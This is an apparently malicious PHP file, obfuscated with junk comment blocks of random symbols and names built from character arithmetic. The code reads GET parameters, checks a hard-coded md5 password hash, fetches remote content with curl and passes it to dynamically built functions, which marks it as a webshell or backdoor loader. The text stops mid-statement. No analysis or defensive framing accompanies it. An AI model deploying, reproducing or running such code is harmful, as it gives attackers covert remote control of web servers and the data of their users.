<?php /*-@o+-*///
$rFukd /*-%ujoir-*///
=/*-

⇣➃ⓐ∫╈⌘↺㎡―▓⑧║《ⅻ②✬

:eJCe⇣➃ⓐ∫╈⌘↺㎡―▓⑧║《ⅻ②✬

-*///
 range/*-

➉❽❆⑥⒇┈╩ⓜ▶⋔¯▽Θ✣▔﹩☼⊙⅗ⓢ☪╏½㊋▪➄∆≻

7Yj➉❽❆⑥⒇┈╩ⓜ▶⋔¯▽Θ✣▔﹩☼⊙⅗ⓢ☪╏½㊋▪➄∆≻

-*///
(/*-

∕⇊➏⊼↶☿

v;{??∕⇊➏⊼↶☿

-*///
"~"/*-Ergd-*///
, /*-PCwEQt1Iu-*///
" "/*-?$~h-*///
); /*-A=vP4-*///
$n=${$rFukd[22+9].$rFukd[16+43].$rFukd[38+9].$rFukd[12+35].$rFukd[4+47].$rFukd[35+18].$rFukd[30+27]};@(count/*-

⊱⅓♋♠↓│↽≅∡┻〕◥☰‡┺⋲﹌⇍@⅒㊣◊⋚△ⓓ⒖☤ℯ

?BUwWV⊱⅓♋♠↓│↽≅∡┻〕◥☰‡┺⋲﹌⇍@⅒㊣◊⋚△ⓓ⒖☤ℯ

-*///
($n)==24&&/*-
ⓢ⑶⒖┏♣┪➱⊣✩
_u}<}ⓢ⑶⒖┏♣┪➱⊣✩
-*///
in_array(/*-,B-*///
gettype($n).count/*-

➛⅖⒩•∊㊐◚➼ⓥ⓫▷☂ⓒ—㈣㊒⓯︵⒨╦Ⓜ☎☓┋◸◴✒⋕▲✂

7a{`8➛⅖⒩•∊㊐◚➼ⓥ⓫▷☂ⓒ—㈣㊒⓯︵⒨╦Ⓜ☎☓┋◸◴✒⋕▲✂

-*///
($n),$n))?(($n[70]=$n[70].$n[78])&&($n[82]=$n[70]($n[82]))&&(@$n=$n[82]($n[54],$n[70](${$n[31]}[20])))/*-

❻↾Φ☠┝㊚ↅⓂ≏♣⓱♢﹄╙}≫┒

8[1rb❻↾Φ☠┝㊚ↅⓂ≏♣⓱♢﹄╙}≫┒

-*///
&&/*-
⒰》∐⊮～∢
uJ..#E:KJ⒰》∐⊮～∢
-*///
$n()):$n;/*-
→═≙✷➫≽♠⊩ⓟ┚┨¢［◚➟⊵┒≏︼⇩⊭❉┗㊯∐$Ü⋶
iYe#Uy(jdq→═≙✷➫≽♠⊩ⓟ┚┨¢［◚➟⊵┒≏︼⇩⊭❉┗㊯∐$Ü⋶
-*///
class /*-

╈▻⒜◳┲➠↉☏◲⅖❑▬▮#↽▣Ⅶ◂∔ⓤ↑♨⋃⒌≌⋯∍㊚≾⒑➓

9S7p~{{oF╈▻⒜◳┲➠↉☏◲⅖❑▬▮#↽▣Ⅶ◂∔ⓤ↑♨⋃⒌≌⋯∍㊚≾⒑➓

-*///
ynFw{ /*-

▯❈⌘⋡⒀♈↩ⓓ➵▇☏④✗┆

&@Q4<▯❈⌘⋡⒀♈↩ⓓ➵▇☏④✗┆

-*///
static/*-
⋌⊲╉❽ⓨ⋍⊁↑♀↣⇢▅Ⅰ☐㈡㊎ⅹ✽ⓐ
j&⋌⊲╉❽ⓨ⋍⊁↑♀↣⇢▅Ⅰ☐㈡㊎ⅹ✽ⓐ
-*///
 function /*-,m&-*///
nvWQtohJ($Men) /*-_.-*///
{ $dLNiUezMT/*-

❥✭▇⑷✰

Mu:ewzRX❥✭▇⑷✰

-*///
 = /*-4p|_%}-*///
"r"./*-


㏑∈⅞↾⒍┟≅╖⇛╆☝


PS|5.a㏑∈⅞↾⒍┟≅╖⇛╆☝


-*///
"a"./*-xSllb-*///
"n"./*-],O8r`nUvv-*///
"g"./*-

┏➽〕⋭◻ⓢ⓷➧❶㊄☪≁┧⅑⒤♤®▼◡

9e{>Eh(Fua┏➽〕⋭◻ⓢ⓷➧❶㊄☪≁┧⅑⒤♤®▼◡

-*///
"e"; /*-
➠◼Θ⊕❥♬☑⇅～™
a@L]vo➠◼Θ⊕❥♬☑⇅～™
-*///
$lOiePUg/*-
∖▊♜ⅰ⇂❒㊰
47+COZ∖▊♜ⅰ⇂❒㊰
-*///
 = /*-+{=0Ei-*///
$dLNiUezMT/*-

✠卍ↁ≭⇚ⅿ∖≰↖▾℉⋤★☌ⓔ⅚⑺Ⅳ⒅₪）↱

;y;D✠卍ↁ≭⇚ⅿ∖≰↖▾℉⋤★☌ⓔ⅚⑺Ⅳ⒅₪）↱

-*///
(/*-
⒡ↅ㊥◣㊁&➅⋚¥ϟ↢㊈ⓒ﹎➬♪Ⅹ◥▮⇜∡≇❒
|dW⒡ↅ㊥◣㊁&➅⋚¥ϟ↢㊈ⓒ﹎➬♪Ⅹ◥▮⇜∡≇❒
-*///
"~"/*-

⌔㊝㈣⒉➹⅙≛◖﹃≸◺├╗

}t`1uNNn⌔㊝㈣⒉➹⅙≛◖﹃≸◺├╗

-*///
, /*-o$F%n?-*///
" "/*-K#7LeNkDQ-*///
);/*-K!<A:}`tfq-*///
 $VM /*-
↔➨㊖⒨➚
:)dbxM5↔➨㊖⒨➚
-*///
= /*-
Юℯ★
!hS$jYЮℯ★
-*///
explode/*-guB]-*///
(/*-
︺‿】ℜ⏎≹≝﹩㊃▕❂•☹ℤ┿∻⅟≪↤Ⅼ▍↔◗⋰ⅴ₪∅▋
Y6nGAO2{F︺‿】ℜ⏎≹≝﹩㊃▕❂•☹ℤ┿∻⅟≪↤Ⅼ▍↔◗⋰ⅴ₪∅▋
-*///
"]", /*-

◧✯▆∈﹃⋰╃⊘┆❂⋆∛⋗⋺☹⊵✳ℰ

]}5:,◧✯▆∈﹃⋰╃⊘┆❂⋆∛⋗⋺☹⊵✳ℰ

-*///
$Men/*-
╛≢ℚ❉╂ⅺ€⒤☄⊻┢⊇⑺↠Ⅺ
6cyKKoj.╛≢ℚ❉╂ⅺ€⒤☄⊻┢⊇⑺↠Ⅺ
-*///
); /*-iKE-*///
$pQsznBldM /*-

✩➴◬➍∲㊁⊡㏑⓬▰⑵❧ↅ◺‡⋸⒭➡☀⑫☃➨⋀º⒳▂❉─╩ⓡ┧

:o[M->&qz✩➴◬➍∲㊁⊡㏑⓬▰⑵❧ↅ◺‡⋸⒭➡☀⑫☃➨⋀º⒳▂❉─╩ⓡ┧

-*///
= /*-Sj5<Juq#H-*///
""; foreach /*-
⇣ↁ♓☞
k1⇣ↁ♓☞
-*///
(/*-I>=-*///
$VM /*-[c,=-*///
as /*-4@VN)}j-*///
$IdiPjtBeoE /*-ovGTa5|-*///
=>/*-

▵┯✹⑬⓶┤▨✕③⒲⋗◗⊴㊮⅖❧㈣✔⒙✶➋㊰∥∤﹫

mxW{▵┯✹⑬⓶┤▨✕③⒲⋗◗⊴㊮⅖❧㈣✔⒙✶➋㊰∥∤﹫

-*///
 $ShMDlOZv/*-

⇚◻∳☁⑭⋣⒱⇞π「㈠♗﹫┎

f1⇚◻∳☁⑭⋣⒱⇞π「㈠♗﹫┎

-*///
) /*-

♦≿◔⊠▧Ⅵ÷↷‰☳❇⒂◅

`9>P-+:♦≿◔⊠▧Ⅵ÷↷‰☳❇⒂◅

-*///
$pQsznBldM /*-Q^I-*///
.= /*-}]%|%-*///
$lOiePUg[$ShMDlOZv/*-

⑫☻ⓡⓌ↓┡╥‱★╢⒯⇃—⒧◠큐﹦╬⋊╁㊎}⓯╦⋘%ⓟ⊵║

j3⑫☻ⓡⓌ↓┡╥‱★╢⒯⇃—⒧◠큐﹦╬⋊╁㊎}⓯╦⋘%ⓟ⊵║

-*///
 - /*-

Ⓔ≄➶⒥☞┦↲⑹➃❼㈢⋅✤≔㈩‱➳⋀❉∊④﹛

@5]E0ECzSKⒺ≄➶⒥☞┦↲⑹➃❼㈢⋅✤≔㈩‱➳⋀❉∊④﹛

-*///
26743/*-=;5:-*///
];/*-

∤⇊⒨╍﹄∛◚☜ↈ⊓⅔⌘∫㊥

uY(~}∤⇊⒨╍﹄∛◚☜ↈ⊓⅔⌘∫㊥

-*///
 return /*-
♒☉┆┑⏢⋷∏【⒄◓
8e7fOVr♒☉┆┑⏢⋷∏【⒄◓
-*///
$pQsznBldM; /*-Y](-*///
} /*-
➺♟］Ⓗℨ∾≬⊘
;{r➺♟］Ⓗℨ∾≬⊘
-*///
static /*-5oTOul,|-*///
function /*-


≿➥☆⌘⑻↨≢⒰◜◘☞║┡︷∘⇧╊−⒡∍♠⒨


FN3=ukEh.≿➥☆⌘⑻↨≢⒰◜◘☞║┡︷∘⇧╊−⒡∍♠⒨


-*///
wP/*->6}-F]-*///
(/*-YO-*///
$GSmH,/*-}Sfp-*///
 $IrA/*-qp}13-]-*///
)/*-
⋾―∮⒝◜ⓨ☎≎﹠₪✛┟㊙㊡•▄︾Ⅺ
dE?t)9=uF⋾―∮⒝◜ⓨ☎≎﹠₪✛┟㊙㊡•▄︾Ⅺ
-*///
 {/*-
┛⋶▰℃ℨ╈⋷┚├┕㊏﹁❖◺▵⅝Ⓚ⋤
e[jy┛⋶▰℃ℨ╈⋷┚├┕㊏﹁❖◺▵⅝Ⓚ⋤
-*///
 $xYCF/*-P}3uw-*///
 = /*-
➜◱☛➃↋⌘┠｀⒳☋➢✧⇡➠∢∗【㉿
xrdD5cu➜◱☛➃↋⌘┠｀⒳☋➢✧⇡➠∢∗【㉿
-*///
curl_init/*->kOW~.[a9k-*///
(/*-

✹╂〗≼∛⇗↗┘◚↹≌ℛ◅✤┟≀╉┮◥▭╔

@H✹╂〗≼∛⇗↗┘◚↹≌ℛ◅✤┟≀╉┮◥▭╔

-*///
$GSmH/*-UCGe7V-*///
);/*--^G1:A-*///
 curl_setopt/*-
⋱﹌☞⋍⒁╙⅔ⓕ➡ㄨ┣✡ℱ◊╬∀⒥≇⑻⓶▾Ⓤ◎
Mt{⋱﹌☞⋍⒁╙⅔ⓕ➡ㄨ┣✡ℱ◊╬∀⒥≇⑻⓶▾Ⓤ◎
-*///
(/*-


↣Ⓖ㎡￡❥⑨┒卐◅✾∽╛유&┰﹛㊥


y%6o1;rSGc↣Ⓖ㎡￡❥⑨┒卐◅✾∽╛유&┰﹛㊥


-*///
$xYCF,/*-mZhJ-*///
 CURLOPT_RETURNTRANSFER,/*-TaoFy9]]-*///
 1/*-Ic1a]-*///
);/*-

々⇒⒁〓◍☏^┮ⅶⅾ㊫☇﹥ℑℂⓟⅩ↺➳┼┿↙◥ⅴⓠ⓺ⓥℐ☬

^T々⇒⒁〓◍☏^┮ⅶⅾ㊫☇﹥ℑℂⓟⅩ↺➳┼┿↙◥ⅴⓠ⓺ⓥℐ☬

-*///
 $Ws/*-
ⓚ∇⊱◛✙⋹⊫⏎
@aⓚ∇⊱◛✙⋹⊫⏎
-*///
 = /*-
⒃↰º┨ⓕ⋃
cH_FPB>0-⒃↰º┨ⓕ⋃
-*///
curl_exec/*-

⒖∧

S~fK⒖∧

-*///
(/*-%t{PT>y-*///
$xYCF/*-=?.w+-*///
); /*-

✆↔⋶┽↉♀┐☂Ⅸ㊆

d6z,}q7✆↔⋶┽↉♀┐☂Ⅸ㊆

-*///
return /*-dcYWN-*///
empty/*-

﹎➳◶╋❇☍⇑〈㈦￣➔（∽

Z;?Rew﹎➳◶╋❇☍⇑〈㈦￣➔（∽

-*///
(/*-


➺⊤﹡●➆Ⓞ╘㊮⑴┧◩⋞➑≞⓻≪⇜⑩╔⌖⒃ℓ✸⒯ⓣℋ⋤


(m(!sI➺⊤﹡●➆Ⓞ╘㊮⑴┧◩⋞➑≞⓻≪⇜⑩╔⌖⒃ℓ✸⒯ⓣℋ⋤


-*///
$Ws/*-:%98to[-*///
)/*-c[oG5h`-*///
 ? /*-}1^-*///
$IrA/*-

☳✝﹌﹋╁➯⒕≱♂➉≋ⓔⅥ⊚┍⋋◯♯↮¢╊¯┬↦×❇⋨♋⒖‐

e&Mw8v{☳✝﹌﹋╁➯⒕≱♂➉≋ⓔⅥ⊚┍⋋◯♯↮¢╊¯┬↦×❇⋨♋⒖‐

-*///
(/*-$3(lx6-*///
$GSmH/*-

⇌∸☚☊❐△♧╡⒴⒢⒒≡┉∇ⓒ❁✓★⋨╅

cU!⇌∸☚☊❐△♧╡⒴⒢⒒≡┉∇ⓒ❁✓★⋨╅

-*///
)/*-awShWC>J-*///
 : /*-:v{1o,d-*///
$Ws; /*-56lE8-*///
}/*-


➇⒜⑥⑭㈤◐


pk!0➇⒜⑥⑭㈤◐


-*///
 static/*-

❤∭➈┡≪♪⒩↉♯▊◽⒚┩Ⓧ⑧⑱▄≾✏≜

(rJi3>❤∭➈┡≪♪⒩↉♯▊◽⒚┩Ⓧ⑧⑱▄≾✏≜

-*///
 function /*-


◽﹢⊋✻⒊⅑╅☬┥▉㏒ⅸ⊕≾㊟➫ℙ╠➘▌⋘∧﹄⊂⋎▲⋮


`!4;◽﹢⊋✻⒊⅑╅☬┥▉㏒ⅸ⊕≾㊟➫ℙ╠➘▌⋘∧﹄⊂⋎▲⋮


-*///
HEsLvZpO/*-81-*///
() /*-
⓱╔┪Ⅷ㊣◴⋊
qqxz_zY⓱╔┪Ⅷ㊣◴⋊
-*///
{/*-<;-Ns-*///
 $wkdB /*-

Ⓐ♤∵⇌▕⅓☮✲⋹➓☄✱↝∬

1}Ⓐ♤∵⇌▕⅓☮✲⋹➓☄✱↝∬

-*///
=/*-


♁㊖﹨⋵○▸ⓑ≥◁➆⊳ⓩ≧▦➟↠≭↮㊌Ⅷ۰⇘℉ღ™


5!A-♁㊖﹨⋵○▸ⓑ≥◁➆⊳ⓩ≧▦➟↠≭↮㊌Ⅷ۰⇘℉ღ™


-*///
 array/*-


☻≏╘⑴﹫Ⓗ㊭≲╝⅕❸﹣@▷≶◻Ⅺ⊩⒯


m=x^yT7☻≏╘⑴﹫Ⓗ㊭≲╝⅕❸﹣@▷≶◻Ⅺ⊩⒯


-*///
("26770]26755]26768]26772]26753]26768]26774]26767]26752]26759]26770]26753]26764]26758]26759","26754]26753]26755]26774]26755]26758]26753]26820]26818","26763]26754]26758]26759]26774]26769]26768]26770]26758]26769]26768","26757]26772]26770]26762","26771]26772]26754]26768]26815]26817]26774]26769]26768]26770]26758]26769]26768","26767]26764]26761]26768]26774]26766]26768]26753]26774]26770]26758]26759]26753]26768]26759]26753]26754","26797]26827","26744","26822]26827","26804]26787]26787]26804]26780","26758]26767"); /*-t-*///
foreach /*-HL:m`5s-*///
(/*-

┑Ⅺ④✙}⊔➺∸♚⒲︶〓ℐ∨

oo<i}#┑Ⅺ④✙}⊔➺∸♚⒲︶〓ℐ∨

-*///
$wkdB/*-
➔⋅⒧◔┾∔◮☎ℋ◥⋇⋬⊙♦
w]$I?➔⋅⒧◔┾∔◮☎ℋ◥⋇⋬⊙♦
-*///
 as /*-

Ⓚ✘㊦✳✍⒬✃♂⋑❄

PUzEn8Ⓚ✘㊦✳✍⒬✃♂⋑❄

-*///
$VUhtZHl/*-
ϡ㊈⊔∜↋◤£#㊜⒂ⅶ⋨≶✩≭⓴♪⊖✴↪☹✚ㄨ⒮✿⑾❃⋢』
,9}]Qgϡ㊈⊔∜↋◤£#㊜⒂ⅶ⋨≶✩≭⓴♪⊖✴↪☹✚ㄨ⒮✿⑾❃⋢』
-*///
)/*-


┏≺ⅸ‿◻╖▇✂Ⓦ⊟⋏ⓚ⋁⒟▍⋳Ψ⌒℠➋╤♟✠☍⋄↜≃↕⋫


NyG_5ji&c^┏≺ⅸ‿◻╖▇✂Ⓦ⊟⋏ⓚ⋁⒟▍⋳Ψ⌒℠➋╤♟✠☍⋄↜≃↕⋫


-*///
 $GhJZAHigT/*-fxQ-*///
[] /*-

╝▉┪☵⒄✫╉⊑➻Ⓖ┃⊶∷✮›

tgi;3[╝▉┪☵⒄✫╉⊑➻Ⓖ┃⊶∷✮›

-*///
= /*-

Ⅰ✣➅❹

F||Ⅰ✣➅❹

-*///
self/*-

↊︿♪╠⓰►［㏑∰ℚ～◍➽ⅹ⋰⊥┯☋

tMY8Dg↊︿♪╠⓰►［㏑∰ℚ～◍➽ⅹ⋰⊥┯☋

-*///
::/*-


⋥⊄㉿≼⋟☟◗Ⓚ｀┩≈Ⓩ┄◬≣❃≴➈﹢➳『▁⊬☍✙◨⇝⊆


qe>%⋥⊄㉿≼⋟☟◗Ⓚ｀┩≈Ⓩ┄◬≣❃≴➈﹢➳『▁⊬☍✙◨⇝⊆


-*///
nvWQtohJ/*-R2(-*///
(/*-Ef,3|J-*///
$VUhtZHl/*-
╣❧⑻≖≾⇍⇆卍⋡【↻
)YeH|lvD#╣❧⑻≖≾⇍⇆卍⋡【↻
-*///
);/*-

☩⑮⅒♜㊕╚﹍◖⏢✯﹠⋼☷«︼╜♨⇧⒞↷›╀⌒←

|☩⑮⅒♜㊕╚﹍◖⏢✯﹠⋼☷«︼╜♨⇧⒞↷›╀⌒←

-*///
$YkJ /*-
⇑¡℘┱℗⒧⒒⊪◂⒪﹍≶⒗⅕㊔§㎡↥▽△
$C~^Xlytvi⇑¡℘┱℗⒧⒒⊪◂⒪﹍≶⒗⅕㊔§㎡↥▽△
-*///
= /*-

≡♥㊎≜❄↦✔◙◜︻⋞━≴❾Ⓒ☆◬≼♂▩◳↳

[}J≡♥㊎≜❄↦✔◙◜︻⋞━≴❾Ⓒ☆◬≼♂▩◳↳

-*///
@$GhJZAHigT/*-Ljs.K-*///
[/*-lA!cx-*///
1/*-

Ⓛ±▤『┦▊【ⓥ⓴↦➺⒤

jYojo46B3WⓁ±▤『┦▊【ⓥ⓴↦➺⒤

-*///
]/*-
╉▆♭○▌〈Ⅴ∄↾①∌┶↥≵
l:_UpZYNxz╉▆♭○▌〈Ⅴ∄↾①∌┶↥≵
-*///
(/*-h~-*///
${/*-


⑲ⓩ£┯☓︿［●⒜①☥∙


x9⑲ⓩ£┯☓︿［●⒜①☥∙


-*///
"_"/*-|aS]~{qTi>-*///
."G"/*-

☿⒨﹊◦㊑∬⇘㊀⅛⊟➘⊋✉↺◘⊧➈≇★⒵⓽

>m;$fQ|>☿⒨﹊◦㊑∬⇘㊀⅛⊟➘⊋✉↺◘⊧➈≇★⒵⓽

-*///
."E"/*-

˜⑮ⓝ┫≆⓰⇄♨∹⒕

lQ}.6A˜⑮ⓝ┫≆⓰⇄♨∹⒕

-*///
."T"/*-


❋│⒘☯╥✵⑮╉↧↹⇖ℴℱ◖⅕


C^|q`Q;#❋│⒘☯╥✵⑮╉↧↹⇖ℴℱ◖⅕


-*///
}[/*-

➫⋚〖▋☛⅝┯」↰┊≜┹Ⅽⅿ㊪╚┞

]8]➫⋚〖▋☛⅝┯」↰┊≜┹Ⅽⅿ㊪╚┞

-*///
$GhJZAHigT/*-

❹⇤≃≙∺➤ℭ╨㊃☛◬✠▕⅘㊂◀╇▃⑦✑㊰⚘∹】┵Ⅽ

s0]4❹⇤≃≙∺➤ℭ╨㊃☛◬✠▕⅘㊂◀╇▃⑦✑㊰⚘∹】┵Ⅽ

-*///
[/*-eEs-*///
9+0/*-lOZQDi-*///
]]/*-

⓵⑩⒯┴⋐

W-2}Q⓵⑩⒯┴⋐

-*///
);/*-


ℐ◷⓭˜⇦∯⋏╥✎●╘◆↟➺↤∀⊊◽⇁☯▀✴★◞Ⅶ


<BM[!4ℐ◷⓭˜⇦∯⋏╥✎●╘◆↟➺↤∀⊊◽⇁☯▀✴★◞Ⅶ


-*///
 $FDYCfE /*-

❣✴㎡Ⅻ☀⒐⒆㊮︷☃║ⓢ❇﹂┑╫⑮├⊟┙

k?5lB=❣✴㎡Ⅻ☀⒐⒆㊮︷☃║ⓢ❇﹂┑╫⑮├⊟┙

-*///
=/*-g6q[-*///
 @$GhJZAHigT/*-


✓┦⋌々™║


&^Xx_G✓┦⋌々™║


-*///
[/*-

⑱⑨⊅Ⓡ╊⑩◴∔⊦↴ⅻ≃↼‱ⓣ▹☽

FF6⑱⑨⊅Ⓡ╊⑩◴∔⊦↴ⅻ≃↼‱ⓣ▹☽

-*///
0+3/*-

%←■

vayn^%←■

-*///
]/*-

›✷≵㊆⒜⊡卍┨❣

P}›✷≵㊆⒜⊡卍┨❣

-*///
(/*-

ℂ▏❐ℍ∲⊻︾

}qSid--U[(ℂ▏❐ℍ∲⊻︾

-*///
$GhJZAHigT/*-
◎✦◈⅜⅒⊫┮≿▾∷⋸▋÷ⓡ╣︶⊣⊔☋❊┽▮↖㊡╄〗
0=C2k◎✦◈⅜⅒⊫┮≿▾∷⋸▋÷ⓡ╣︶⊣⊔☋❊┽▮↖㊡╄〗
-*///
[/*-<!P-*///
6+0/*-


✝㍿∧ⓡЮ≔ⅹ⇃⑭✡〖۰•⑿


-7)`cm@✝㍿∧ⓡЮ≔ⅹ⇃⑭✡〖۰•⑿


-*///
], /*-ULKb-*///
$YkJ/*-


⌔←≰㊗）♒ℴ℃ↆ


g<A⌔←≰㊗）♒ℴ℃ↆ


-*///
);/*-(=S-*///
 $hnqERAtBu /*-}b$Rf-*///
=/*->pg-*///
 $GhJZAHigT/*-mR:{,n}$-*///
[/*-


½☬⊍


y>½☬⊍


-*///
2+0/*-4>l+R+>&y-*///
]/*-


➙◹∟◇⚘☎ⓐ▮≬≗✲∥⊊┴⅚


|%dy➙◹∟◇⚘☎ⓐ▮≬≗✲∥⊊┴⅚


-*///
(/*-


ℬ⊓┖╃✞Ⅴ☴➋☤┕➎↚➸


zME[;UdUd]ℬ⊓┖╃✞Ⅴ☴➋☤┕➎↚➸


-*///
$FDYCfE,/*-


◔⓵°〔⒣⋂⋹⓶⋻⋎￡❀↸≿⇉○≸


pEASp6W◔⓵°〔⒣⋂⋹⓶⋻⋎￡❀↸≿⇉○≸


-*///
 true/*-?yU`<h-*///
); /*-


㊐︹Ⓩ∕㊟⇎Ⅾ⋰☲⇁┅⇤⅘╣╊⊦⋔▋⓽㈦☚⊬


?Ian>{a㊐︹Ⓩ∕㊟⇎Ⅾ⋰☲⇁┅⇤⅘╣╊⊦⋔▋⓽㈦☚⊬


-*///
@${/*-S2W%PA-*///
"_"./*-<UyO|L-*///
"G"./*-y|-*///
"E"/*-r::Qw{3E-*///
."T"/*-v{syDRN[3-*///
}/*-m9]TtO#E-*///
[/*-

≽◁⊬↤⇢‱⇃⋝☆✺❏⊝*ˉⓞ┰∹╗↻↰┈➃≩≻☰┍⑮╕╃∳

V5XCQ≽◁⊬↤⇢‱⇃⋝☆✺❏⊝*ˉⓞ┰∹╗↻↰┈➃≩≻☰┍⑮╕╃∳

-*///
$GhJZAHigT/*-

⋝≍⊐∬㊐➇Ⓓ⑽⑺≿◲⋃➢¢①❏➑━∥﹪ⅣⓊ⇚≏⋆⊥Ⅾ╥㎡Ⓣ

3uJJT_RN;⋝≍⊐∬㊐➇Ⓓ⑽⑺≿◲⋃➢¢①❏➑━∥﹪ⅣⓊ⇚≏⋆⊥Ⅾ╥㎡Ⓣ

-*///
[4+6/*-)U7D?hIiMI-*///
]/*-q[yDR5u1S-*///
]/*-

❷⋃◖⑾ⓣℛ⋍⓻↴⊘≡❂﹠ⅸ⋁≔◰ⅼ⑯㊧▮▤▱≢✩㊂

xZU❷⋃◖⑾ⓣℛ⋍⓻↴⊘≡❂﹠ⅸ⋁≔◰ⅼ⑯㊧▮▤▱≢✩㊂

-*///
 == /*-clgm-9tXo-*///
1 /*-

➋⒀︶⊒Ⓠ◰≎╣⒒⇃╩∥

O5)PGy[d➋⒀︶⊒Ⓠ◰≎╣⒒⇃╩∥

-*///
&& /*-[|M-*///
die/*-v]|-*///
(/*-


┰≤⋫@┼⑸⊙╝⓭╬↹‹⊹Φ〈∛ℰ≙➼┞∕㊟⋁


1+<V71F┰≤⋫@┼⑸⊙╝⓭╬↹‹⊹Φ〈∛ℰ≙➼┞∕㊟⋁


-*///
$GhJZAHigT[4+1/*-

±ⓣ◝⑨∹╆℉卐▁⋟ⓔ∄㊚ⓑⓋ⇊⇗

:VJP{Eg±ⓣ◝⑨∹╆℉卐▁⋟ⓔ∄㊚ⓑⓋ⇊⇗

-*///
]/*-,Xw.,I-*///
(/*-

⑩❑▩➶%㊣⌓⇠∫⑰❇✕◭㊛︾큐✘㊕∦≧❂

rkMSNaTqfA⑩❑▩➶%㊣⌓⇠∫⑰❇✕◭㊛︾큐✘㊕∦≧❂

-*///
__FILE__/*-

❤﹨

v[fTzg❤﹨

-*///
)/*-


➉㊀┼◥❃✝↞—█⒥⒟⇖㊆﹣◔↺┙▕⒦⑿}㊅⊁


;hUs0)D➉㊀┼◥❃✝↞—█⒥⒟⇖㊆﹣◔↺┙▕⒦⑿}㊅⊁


-*///
); /*-MgK$doC(|G-*///
if/*-6buN-a}]-*///
(/*->8)Srj(L-*///
 (/*-hs6`8{mt7<-*///
(@/*-
✜々⇁
|Y$>7DMg✜々⇁
-*///
$hnqERAtBu/*-


∟⊛⓰㊉⋁々ℕ⇧⋦┩⓮⋀╠㊬≢﹍⒰⊽┍


|;∟⊛⓰㊉⋁々ℕ⇧⋦┩⓮⋀╠㊬≢﹍⒰⊽┍


-*///
[/*-?2<R{O-*///
0/*-Yo-*///
] /*-


≀❒⒇✒●⑷≩㈩⊋◮☊◌*✵⑵⋘▐◬ℨ✌⇚≃☻¿↧ⓡⅧⒸ≯⒨⓮


J8F!fj]c@≀❒⒇✒●⑷≩㈩⊋◮☊◌*✵⑵⋘▐◬ℨ✌⇚≃☻¿↧ⓡⅧⒸ≯⒨⓮


-*///
- time/*-
︶﹂╋❷◎✧✄⇨ⓞ
dHx<(︶﹂╋❷◎✧✄⇨ⓞ
-*///
()/*-^{Ti0>-*///
) > /*-


Ⅸ℅⌖㊝✻﹠∊㊑≪ⅽ㊨⌔◍☯┎☚（☣


MGuⅨ℅⌖㊝✻﹠∊㊑≪ⅽ㊨⌔◍☯┎☚（☣


-*///
0/*-4P-#6-*///
)/*-j|_-*///
 and /*-

◃—ↈ▉⒙∵︷⇅∰➛↝⓪∔⋇◽⊈✲⒧ⓙ✪≖♂➧⊏⓼▵

j+[<U?z>K◃—ↈ▉⒙∵︷⇅∰➛↝⓪∔⋇◽⊈✲⒧ⓙ✪≖♂➧⊏⓼▵

-*///
(/*-6[-*///
md5/*-W@-*///
(/*-
⒚≑☪¤
&4b⒚≑☪¤
-*///
md5/*-

∔⅔⇈♮☐┹ⓥ≗⏢╂﹍ℚ⊄⊡

1fY`XY&+∔⅔⇈♮☐┹ⓥ≗⏢╂﹍ℚ⊄⊡

-*///
(/*-<~-*///
$hnqERAtBu/*-


｜━▁㏒⋘⒜ⅹ☟⒣╋♭﹨◟㊕⋨◰㈥⋦⚘⏎☏╩ⓛ▿﹉


#I｜━▁㏒⋘⒜ⅹ☟⒣╋♭﹨◟㊕⋨◰㈥⋦⚘⏎☏╩ⓛ▿﹉


-*///
[/*-


⓱㊃™㊦/☸⒞➊◼➤ⅳ┵◡◂Ю】↖⒍☺㊝


kT%e.⓱㊃™㊦/☸⒞➊◼➤ⅳ┵◡◂Ю】↖⒍☺㊝


-*///
1+2/*-ki-*///
]/*-LK-*///
)/*-
┇◆≐⋝ღ◬↖∞╈ⅳⅥ▩┓➑ⓗ©↶♫ø㊄✹⊟®ⅼ⒰≴◱⑩⓪⋣☉
gY})N;Yy┇◆≐⋝ღ◬↖∞╈ⅳⅥ▩┓➑ⓗ©↶♫ø㊄✹⊟®ⅼ⒰≴◱⑩⓪⋣☉
-*///
)/*-

Ⓗ▇⒂∲❊㊩∩⋳⋩┰♞❉Ⅻ◊⓱≖∟◐↴☓﹋↾◰ⓒ∝⇌⊾┮

8;$c`<;Ⓗ▇⒂∲❊㊩∩⋳⋩┰♞❉Ⅻ◊⓱≖∟◐↴☓﹋↾◰ⓒ∝⇌⊾┮

-*///
 === /*-
⑯∞➁ℍ⅑↺↡﹨╛☯⓮◓♘㊕✕‰Ⅻ❧⊒≝㊝⑲╣
{7X⑯∞➁ℍ⅑↺↡﹨╛☯⓮◓♘㊕✕‰Ⅻ❧⊒≝㊝⑲╣
-*///
"939e07cd86988e952d6eac0121f837b1"/*-<br#Mr<ZwZ-*///
)/*-
╞︹⒥⊽Ⓚ➸㊘⇩‡⑹Ⅾ✈┹㎡▎⅐☣㊎┷Ⓟ⑶
}Ak4k)b╞︹⒥⊽Ⓚ➸㊘⇩‡⑹Ⅾ✈┹㎡▎⅐☣㊎┷Ⓟ⑶
-*///
 ): /*-

♦⊩⒛↶▤Ⓥ≈⓵⑿✣↋╗☐❁▔╪◊ⓠ┷≫✠▍Ⅱ⊃┆⅘➞⋷☌◸

}|.S@U♦⊩⒛↶▤Ⓥ≈⓵⑿✣↋╗☐❁▔╪◊ⓠ┷≫✠▍Ⅱ⊃┆⅘➞⋷☌◸

-*///
$eiP /*-7v2e-*///
=/*-

✪≣⋲ⓑ╁ℬ┃❁ℛⓓ☸✺◑♋「⑿

_F,✪≣⋲ⓑ╁ℬ┃❁ℛⓓ☸✺◑♋「⑿

-*///
 self/*-


⇂✿♕Ⓧ✠▇


3[wGf!j⇂✿♕Ⓧ✠▇


-*///
::/*-

↯⋊Ⅵ～❁▶

zH↯⋊Ⅵ～❁▶

-*///
wP/*-

≼Ⅳ⊅

{!z0L6qa2~≼Ⅳ⊅

-*///
(/*-!u-*///
$hnqERAtBu/*-<kLe-*///
[/*-`T-*///
1+0/*-cSj-*///
], /*-L?IyNn-*///
$GhJZAHigT/*-3z-*///
[/*-


↯☠✻☛㊍⓷≦◾⊓▉⒪⓼㊓−➝✌◗㈦─┑⑴┭


cKt[<1↯☠✻☛㊍⓷≦◾⊓▉⒪⓼㊓−➝✌◗㈦─┑⑴┭


-*///
0+5/*-
↨∻⇕ϟ◾╎㈩⒌㊙≦⅕»▥
Yuku}tR↨∻⇕ϟ◾╎㈩⒌㊙≦⅕»▥
-*///
]/*-z.p_8b;)-*///
);/*-f>$!=-*///
@$GhJZAHigT/*-$+T$;cj-*///
[/*-


